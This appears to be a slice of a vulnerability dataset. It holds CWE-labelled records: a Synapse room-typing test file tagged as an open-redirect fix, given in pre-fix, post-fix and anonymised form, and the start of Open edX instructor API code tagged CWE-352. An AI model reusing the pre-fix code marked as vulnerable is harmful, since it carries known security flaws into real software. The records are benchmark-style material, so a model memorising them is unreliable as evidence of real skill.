1242,
1246,
1249,
1251,
1256,
1257,
1259,
1261,
1263,
1266,
1268,
1269,
1270,
1276,
1280,
1282,
1284,
1287,
1289,
1290,
1291,
1300,
1301,
1303,
1304,
1306,
1307,
1310,
1311,
1315,
1317,
1318,
1319,
1328,
1329,
1331,
1332,
1334,
1335,
1338,
1339,
1343,
1345,
1346,
1347,
1348,
1349,
1355,
1365,
1369,
1379,
1381,
1383,
1386,
1388,
1389,
1390,
1396,
1401,
1403,
1405,
1408,
1410,
1411,
1412,
1418,
1424,
1426,
1428,
1431,
1433,
1434,
1435,
1441,
1446,
1448,
1450,
1453,
1455,
1456,
1457,
1467,
1469,
1471,
1474,
1476,
1477,
1478,
1479,
1480,
1486,
1497,
1500,
1511,
1513,
1515,
1518,
1520,
1521,
1522,
1530,
1532,
1536,
1538,
1542,
1545,
1548,
1550,
1553,
1554,
1559,
1560,
1568,
1570,
1572,
1575,
1577,
1578,
1579,
1580,
1581,
1588,
1590,
1593,
1595,
1600,
1603,
1605,
1606,
1607,
1608,
1609,
1615,
1624,
1627,
1635,
1637,
1639,
1642,
1644,
1645,
1646,
1652,
1656,
1658,
1660,
1663,
1665,
1666,
1667,
1672,
1674,
1678,
1680,
1682,
1685,
1687,
1688,
1689,
1690,
1691,
1697,
1700,
1702,
1704,
1707,
1709,
1710,
1711,
1717,
1720,
1722,
1724,
1727,
1729,
1730,
1731,
1732,
1733,
1739,
1742,
1744,
1746,
1749,
1751,
1752,
1753,
1754,
1755,
1761,
1764,
1766,
1768,
1771,
1773,
1774,
1775,
1781,
1785,
1787,
1789,
1792,
1794,
1795,
1796,
1797,
1798,
1801,
1802,
1803,
1810,
1813,
1816,
1817,
1819,
1820,
1823,
1824,
1826,
1827,
1830,
1831,
1833,
1834,
1839,
1840,
1845,
1846,
1851,
1852,
1857,
1858,
1859,
1864,
1873,
1878,
1879,
1886,
1887,
1889,
1891,
1897,
1902,
1903,
1904,
1908,
1909,
1910,
1921,
1922,
1931,
1933,
1934,
1936,
1939,
1944,
1945,
1946,
1947,
1948,
1951,
1955,
1960,
1962,
1963,
1964,
107,
108,
109,
148,
149,
150,
183,
184,
185,
198,
199,
200,
235,
236,
237,
266,
267,
268,
285,
286,
287,
365,
366,
367,
396,
397,
398,
454,
455,
456,
514,
515,
516,
517,
564,
565,
566,
567,
591,
592,
593,
594,
640,
641,
642,
643,
644,
696,
697,
698,
699,
757,
758,
759,
760,
761,
818,
819,
820,
836,
837,
838,
851,
852,
853,
871,
872,
873,
874,
892,
893,
894,
895,
926,
927,
928,
1005,
1006,
1007,
1018,
1019,
1020,
1029,
1030,
1031,
1032,
1043,
1044,
1045,
1073,
1074,
1075,
1114,
1115,
1116,
1117,
1118,
1119,
1135,
1136,
1137,
1138,
1139,
1140,
1141,
1157,
1158,
1159,
1160,
1161,
1162,
1178,
1179,
1180,
1181,
1182,
1183,
1184,
1206,
1207,
1208,
1209,
1210,
1226,
1227,
1228,
1229,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1238,
1239,
1240,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1253,
1254,
1255,
1274,
1275,
1276,
1277,
1278,
1279,
1295,
1296,
1297,
1298,
1299,
1323,
1324,
1325,
1326,
1327,
1353,
1354,
1355,
1356,
1357,
1358,
1359,
1360,
1361,
1362,
1363,
1364,
1365,
1366,
1367,
1368,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1416,
1417,
1418,
1419,
1420,
1421,
1422,
1423,
1439,
1440,
1441,
1442,
1443,
1444,
1445,
1461,
1462,
1463,
1464,
1465,
1466,
1484,
1485,
1486,
1487,
1488,
1489,
1490,
1491,
1492,
1493,
1494,
1495,
1496,
1497,
1498,
1499,
1526,
1527,
1528,
1529,
1564,
1565,
1566,
1567,
1586,
1587,
1588,
1589,
1590,
1591,
1592,
1613,
1614,
1615,
1616,
1617,
1618,
1619,
1620,
1621,
1622,
1623,
1624,
1625,
1626,
1650,
1651,
1652,
1653,
1654,
1655,
1671,
1672,
1673,
1674,
1675,
1676,
1677,
1695,
1696,
1697,
1698,
1699,
1715,
1716,
1717,
1718,
1719,
1737,
1738,
1739,
1740,
1741,
1759,
1760,
1761,
1762,
1763,
1779,
1780,
1781,
1782,
1783,
1784,
1805,
1806,
1807,
1808,
1809,
1810,
1811,
1812,
1813,
1814,
1815,
1836,
1837,
1838,
1861,
1862,
1863,
1881,
1882,
1883,
1884,
1885,
1924,
1925,
1926,
1927,
1928,
1929,
1930
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /rooms paths."""
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
PATH_PREFIX = "/_matrix/client/api/v1"
class RoomTypingTestCase(unittest.HomeserverTestCase):
""" Tests /rooms/$room_id/typing/$user_id REST API. """
user_id = "@sid:red"
user = UserID.from_string(user_id)
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
"red", http_client=None, federation_client=Mock(),
)
self.event_source = hs.get_event_sources().sources["typing"]
hs.get_federation_handler = Mock()
async def get_user_by_access_token(token=None, allow_guest=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
hs.get_auth().get_user_by_access_token = get_user_by_access_token
async def _insert_client_ip(*args, **kwargs):
return None
hs.get_datastore().insert_client_ip = _insert_client_ip
def get_room_members(room_id):
if room_id == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def fetch_room_distributions_into(
room_id, localusers=None, remotedomains=None, ignore_user=None
):
members = yield get_room_members(room_id)
for member in members:
if ignore_user is not None and member == ignore_user:
continue
if hs.is_mine(member):
if localusers is not None:
localusers.add(member)
else:
if remotedomains is not None:
remotedomains.add(member.domain)
hs.get_room_member_handler().fetch_room_distributions_into = (
fetch_room_distributions_into
)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
# Need another user to make notifications actually work
self.helper.join(self.room_id, user="@jim:red")
def test_set_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
events = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
events[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def test_set_not_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, channel.code)
def test_typing_timeout(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /rooms paths."""
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
PATH_PREFIX = "/_matrix/client/api/v1"
class RoomTypingTestCase(unittest.HomeserverTestCase):
""" Tests /rooms/$room_id/typing/$user_id REST API. """
user_id = "@sid:red"
user = UserID.from_string(user_id)
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
"red", federation_http_client=None, federation_client=Mock(),
)
self.event_source = hs.get_event_sources().sources["typing"]
hs.get_federation_handler = Mock()
async def get_user_by_access_token(token=None, allow_guest=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
hs.get_auth().get_user_by_access_token = get_user_by_access_token
async def _insert_client_ip(*args, **kwargs):
return None
hs.get_datastore().insert_client_ip = _insert_client_ip
def get_room_members(room_id):
if room_id == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def fetch_room_distributions_into(
room_id, localusers=None, remotedomains=None, ignore_user=None
):
members = yield get_room_members(room_id)
for member in members:
if ignore_user is not None and member == ignore_user:
continue
if hs.is_mine(member):
if localusers is not None:
localusers.add(member)
else:
if remotedomains is not None:
remotedomains.add(member.domain)
hs.get_room_member_handler().fetch_room_distributions_into = (
fetch_room_distributions_into
)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
# Need another user to make notifications actually work
self.helper.join(self.room_id, user="@jim:red")
def test_set_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
events = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
events[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def test_set_not_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, channel.code)
def test_typing_timeout(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| open_redirect | {
"code": [
" \"red\", http_client=None, federation_client=Mock(),"
],
"line_no": [
42
]
} | {
"code": [
" \"red\", federation_http_client=None, federation_client=Mock(),"
],
"line_no": [
42
]
} |
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
VAR_0 = "/_matrix/client/api/v1"
class CLASS_0(unittest.HomeserverTestCase):
VAR_1 = "@sid:red"
VAR_2 = UserID.from_string(VAR_1)
VAR_3 = [room.register_servlets]
def FUNC_0(self, VAR_4, VAR_5):
VAR_6 = self.setup_test_homeserver(
"red", http_client=None, federation_client=Mock(),
)
self.event_source = VAR_6.get_event_sources().sources["typing"]
VAR_6.get_federation_handler = Mock()
async def FUNC_5(VAR_7=None, VAR_8=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
VAR_6.get_auth().get_user_by_access_token = FUNC_5
async def FUNC_6(*VAR_9, **VAR_10):
return None
VAR_6.get_datastore().insert_client_ip = FUNC_6
def FUNC_7(VAR_11):
if VAR_11 == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def FUNC_8(
VAR_11, VAR_12=None, VAR_13=None, VAR_14=None
):
VAR_18 = yield FUNC_7(VAR_11)
for member in VAR_18:
if VAR_14 is not None and member == VAR_14:
continue
if VAR_6.is_mine(member):
if VAR_12 is not None:
VAR_12.add(member)
else:
if VAR_13 is not None:
VAR_13.add(member.domain)
VAR_6.get_room_member_handler().fetch_room_distributions_into = (
FUNC_8
)
return VAR_6
def FUNC_1(self, VAR_4, VAR_5, VAR_6):
self.room_id = self.helper.create_room_as(self.user_id)
self.helper.join(self.room_id, VAR_2="@jim:red")
def FUNC_2(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
VAR_17 = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
VAR_17[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def FUNC_3(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, VAR_16.code)
def FUNC_4(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 3)
|
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
VAR_0 = "/_matrix/client/api/v1"
class CLASS_0(unittest.HomeserverTestCase):
VAR_1 = "@sid:red"
VAR_2 = UserID.from_string(VAR_1)
VAR_3 = [room.register_servlets]
def FUNC_0(self, VAR_4, VAR_5):
VAR_6 = self.setup_test_homeserver(
"red", federation_http_client=None, federation_client=Mock(),
)
self.event_source = VAR_6.get_event_sources().sources["typing"]
VAR_6.get_federation_handler = Mock()
async def FUNC_5(VAR_7=None, VAR_8=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
VAR_6.get_auth().get_user_by_access_token = FUNC_5
async def FUNC_6(*VAR_9, **VAR_10):
return None
VAR_6.get_datastore().insert_client_ip = FUNC_6
def FUNC_7(VAR_11):
if VAR_11 == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def FUNC_8(
VAR_11, VAR_12=None, VAR_13=None, VAR_14=None
):
VAR_18 = yield FUNC_7(VAR_11)
for member in VAR_18:
if VAR_14 is not None and member == VAR_14:
continue
if VAR_6.is_mine(member):
if VAR_12 is not None:
VAR_12.add(member)
else:
if VAR_13 is not None:
VAR_13.add(member.domain)
VAR_6.get_room_member_handler().fetch_room_distributions_into = (
FUNC_8
)
return VAR_6
def FUNC_1(self, VAR_4, VAR_5, VAR_6):
self.room_id = self.helper.create_room_as(self.user_id)
self.helper.join(self.room_id, VAR_2="@jim:red")
def FUNC_2(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
VAR_17 = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
VAR_17[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def FUNC_3(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, VAR_16.code)
def FUNC_4(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
20,
22,
25,
27,
29,
30,
33,
35,
38,
40,
44,
46,
48,
55,
57,
60,
62,
68,
77,
84,
88,
90,
93,
95,
103,
118,
126,
134,
136,
138,
140,
147,
149,
17,
32
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
20,
22,
25,
27,
29,
30,
33,
35,
38,
40,
44,
46,
48,
55,
57,
60,
62,
68,
77,
84,
88,
90,
93,
95,
103,
118,
126,
134,
136,
138,
140,
147,
149,
17,
32
] |
3CWE-352
| """
Instructor Dashboard API views
JSON views which the instructor dashboard requests.
Many of these GETs may become PUTs in the future.
"""
import StringIO
import json
import logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from student import auth
from student.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from student.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from student.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
log = logging.getLogger(__name__)
def common_exceptions_400(func):
    """
    Catches common exceptions and renders matching 400 errors.
    (decorator without arguments)

    Renders the error as JSON when the client expects JSON (AJAX request or
    an ``Accept: application/json`` header), otherwise as plain text.
    """
    from functools import wraps

    @wraps(func)  # preserve func.__name__/__doc__ for logging and introspection
    def wrapped(request, *args, **kwargs):  # pylint: disable=missing-docstring
        use_json = (request.is_ajax() or
                    request.META.get("HTTP_ACCEPT", "").startswith("application/json"))

        def error_response(message):
            """Render `message` as a 400 in the format the client expects."""
            if use_json:
                return JsonResponse({"error": message}, 400)
            return HttpResponseBadRequest(message)

        try:
            return func(request, *args, **kwargs)
        except User.DoesNotExist:
            return error_response(_("User does not exist."))
        except AlreadyRunningError:
            return error_response(_("Task is already running."))
    return wrapped
def require_query_params(*args, **kwargs):
    """
    Check for required GET parameters or render a 400 error.
    (decorator with arguments)

    `args` is a *list of required GET parameter names.
    `kwargs` is a **dict of required GET parameter names
        to string explanations of the parameter
    """
    # Pair every required name with its (optional) human-readable explanation.
    required_params = [(name, None) for name in args]
    required_params.extend((name, kwargs[name]) for name in kwargs)

    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(*fargs, **fkwargs):  # pylint: disable=missing-docstring
            request = fargs[0]
            missing = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }
            for name, explanation in required_params:
                # A fresh object() sentinel is only equal to itself, so this
                # reliably distinguishes "absent" from any submitted value.
                sentinel = object()
                if request.GET.get(name, sentinel) == sentinel:
                    missing['parameters'].append(name)
                    missing['info'][name] = explanation
            if missing['parameters']:
                return JsonResponse(missing, status=400)
            return func(*fargs, **fkwargs)
        return wrapped
    return decorator
def require_post_params(*args, **kwargs):
    """
    Check for required POST parameters or render a 400 error.
    (decorator with arguments)

    Functions like 'require_query_params', but checks for
    POST parameters rather than GET parameters.
    """
    # Pair every required name with its (optional) human-readable explanation.
    required_params = [(name, None) for name in args]
    required_params.extend((name, kwargs[name]) for name in kwargs)

    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(*fargs, **fkwargs):  # pylint: disable=missing-docstring
            request = fargs[0]
            missing = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }
            for name, explanation in required_params:
                # A fresh object() sentinel is only equal to itself, so this
                # reliably distinguishes "absent" from any submitted value.
                sentinel = object()
                if request.POST.get(name, sentinel) == sentinel:
                    missing['parameters'].append(name)
                    missing['info'][name] = explanation
            if missing['parameters']:
                return JsonResponse(missing, status=400)
            return func(*fargs, **fkwargs)
        return wrapped
    return decorator
def require_level(level):
    """
    Decorator with argument that requires an access level of the requesting
    user. If the requirement is not satisfied, returns an
    HttpResponseForbidden (403).

    Assumes that request is in args[0].
    Assumes that course_id is in kwargs['course_id'].

    `level` is in ['instructor', 'staff']
    if `level` is 'staff', instructors will also be allowed, even
    if they are not in the staff group.
    """
    if level not in ('instructor', 'staff'):
        raise ValueError("unrecognized level '{}'".format(level))

    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(*args, **kwargs):  # pylint: disable=missing-docstring
            request = args[0]
            course = get_course_by_id(CourseKey.from_string(kwargs['course_id']))
            # has_access grants 'staff' to instructors as well.
            if not has_access(request.user, level, course):
                return HttpResponseForbidden()
            return func(*args, **kwargs)
        return wrapped
    return decorator
def require_global_staff(func):
    """View decorator that requires that the user have global staff permissions. """
    def wrapped(request, *args, **kwargs):  # pylint: disable=missing-docstring
        # Reject non-staff up front; only global staff reach the view.
        if not GlobalStaff().has_user(request.user):
            return HttpResponseForbidden(
                u"Must be {platform_name} staff to perform this action.".format(
                    platform_name=settings.PLATFORM_NAME
                )
            )
        return func(request, *args, **kwargs)
    return wrapped
def require_sales_admin(func):
    """
    Decorator for checking sales administrator access before executing an HTTP endpoint. This decorator
    is designed to be used for a request based action on a course. It assumes that there will be a
    request object as well as a course_id attribute to leverage to check course level privileges.

    If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
    """
    def wrapped(request, course_id):  # pylint: disable=missing-docstring
        try:
            course_key = CourseKey.from_string(course_id)
        except InvalidKeyError:
            log.error(u"Unable to find course with course key %s", course_id)
            return HttpResponseNotFound()

        if auth.user_has_role(request.user, CourseSalesAdminRole(course_key)):
            return func(request, course_id)
        return HttpResponseForbidden()
    return wrapped
def require_finance_admin(func):
    """
    Decorator for checking finance administrator access before executing an HTTP endpoint. This decorator
    is designed to be used for a request based action on a course. It assumes that there will be a
    request object as well as a course_id attribute to leverage to check course level privileges.

    If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
    """
    def wrapped(request, course_id):  # pylint: disable=missing-docstring
        try:
            course_key = CourseKey.from_string(course_id)
        except InvalidKeyError:
            log.error(u"Unable to find course with course key %s", course_id)
            return HttpResponseNotFound()

        if auth.user_has_role(request.user, CourseFinanceAdminRole(course_key)):
            return func(request, course_id)
        return HttpResponseForbidden()
    return wrapped
# Column positions expected in the CSV uploaded to register_and_enroll_students:
# email = 0, username = 1, full name = 2, country = 3.
EMAIL_INDEX = 0
USERNAME_INDEX = 1
NAME_INDEX = 2
COUNTRY_INDEX = 3
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def register_and_enroll_students(request, course_id):  # pylint: disable=too-many-statements
    """
    Create new account and Enroll students in this course.
    Passing a csv file that contains a list of students.
    Order in csv should be the following email = 0; username = 1; name = 2; country = 3.
    Requires staff access.

    -If the email address and username already exists and the user is enrolled in the course,
    do nothing (including no email gets sent out)

    -If the email address already exists, but the username is different,
    match on the email address only and continue to enroll the user in the course using the email address
    as the matching criteria. Note the change of username as a warning message (but not a failure). Send a standard enrollment email
    which is the same as the existing manual enrollment

    -If the username already exists (but not the email), assume it is a different user and fail to create the new account.
    The failure will be messaged in a response in the browser.
    """
    # Feature-gated: the microsite value overrides the platform-wide FEATURES flag.
    if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
        return HttpResponseForbidden()
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    warnings = []
    row_errors = []
    general_errors = []
    # for white labels we use 'shopping cart' which uses CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG as
    # course mode for creating course enrollments.
    if CourseMode.is_white_label(course_id):
        course_mode = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
    else:
        course_mode = None
    if 'students_list' in request.FILES:
        students = []
        try:
            upload_file = request.FILES.get('students_list')
            if upload_file.name.endswith('.csv'):
                students = [row for row in csv.reader(upload_file.read().splitlines())]
                course = get_course_by_id(course_id)
            else:
                general_errors.append({
                    'username': '', 'email': '',
                    'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or rows.')
                })
        except Exception:  # pylint: disable=broad-except
            general_errors.append({
                'username': '', 'email': '', 'response': _('Could not read uploaded file.')
            })
        finally:
            # NOTE(review): if request.FILES.get itself raised, `upload_file` would be
            # unbound here and this close() would raise NameError — confirm upstream.
            upload_file.close()
        generated_passwords = []
        row_num = 0
        for student in students:
            row_num = row_num + 1
            # verify that we have exactly four columns in every row but allow for blank lines
            if len(student) != 4:
                if len(student) > 0:
                    general_errors.append({
                        'username': '',
                        'email': '',
                        'response': _('Data in row #{row_num} must have exactly four columns: email, username, full name, and country').format(row_num=row_num)
                    })
                continue
            # Iterate each student in the uploaded csv file.
            email = student[EMAIL_INDEX]
            username = student[USERNAME_INDEX]
            name = student[NAME_INDEX]
            # Country values are truncated to a two-character code.
            country = student[COUNTRY_INDEX][:2]
            # `course` is only bound in the CSV branch above; this loop body runs
            # only when that branch succeeded, since `students` stays empty otherwise.
            email_params = get_email_params(course, True, secure=request.is_secure())
            try:
                validate_email(email)  # Raises ValidationError if invalid
            except ValidationError:
                row_errors.append({
                    'username': username, 'email': email, 'response': _('Invalid email {email_address}.').format(email_address=email)})
            else:
                if User.objects.filter(email=email).exists():
                    # Email address already exists. assume it is the correct user
                    # and just register the user in the course and send an enrollment email.
                    user = User.objects.get(email=email)
                    # see if it is an exact match with email and username
                    # if it's not an exact match then just display a warning message, but continue onwards
                    if not User.objects.filter(email=email, username=username).exists():
                        warning_message = _(
                            'An account with email {email} exists but the provided username {username} '
                            'is different. Enrolling anyway with {email}.'
                        ).format(email=email, username=username)
                        warnings.append({
                            'username': username, 'email': email, 'response': warning_message
                        })
                        log.warning(u'email %s already exist', email)
                    else:
                        log.info(
                            u"user already exists with username '%s' and email '%s'",
                            username,
                            email
                        )
                    # enroll a user if it is not already enrolled.
                    if not CourseEnrollment.is_enrolled(user, course_id):
                        # Enroll user to the course and add manual enrollment audit trail
                        create_manual_course_enrollment(
                            user=user,
                            course_id=course_id,
                            mode=course_mode,
                            enrolled_by=request.user,
                            reason='Enrolling via csv upload',
                            state_transition=UNENROLLED_TO_ENROLLED,
                        )
                        enroll_email(course_id=course_id, student_email=email, auto_enroll=True, email_students=True, email_params=email_params)
                else:
                    # This email does not yet exist, so we need to create a new account
